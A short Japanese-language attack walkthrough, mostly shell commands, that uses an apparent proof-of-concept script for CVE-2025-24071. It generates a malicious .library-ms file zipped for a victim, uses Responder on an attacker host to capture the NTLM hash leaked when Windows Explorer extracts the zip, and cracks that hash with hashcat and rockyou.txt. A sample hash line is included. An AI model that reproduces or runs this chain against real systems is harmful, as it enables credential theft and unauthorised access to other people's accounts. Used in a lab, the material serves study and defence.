
sudo apt update && sudo apt install responder -y
Responder を起動
sudo responder -I eth0
必要なPythonモジュールをインストール
pip install colorama python3 CVE-2025-24071.py -i <attacker_ip> -n testpayload -o ./output --keep
これにより以下が生成されます: testpayload.library-ms testpayload.zip
testpayload.zip を Windows 11 テストマシンに転送します。 Windows エクスプローラーで ZIP を展開します。 これにより Windows が SMB パスへのアクセスを試み、NTLM ハッシュが漏えいします。
responder -I etho0

hash,txt ファイルを作成します
victim::DOMAIN:1122334455667788:11223344556677889900aabbccddeeff:01010000000000000090d5d00f3
最も一般的なのは rockyou.txt です
hashcat -m 5600 -a 0 -o cracked.txt hash.txt /usr/share/wordlists/rockyou.txt
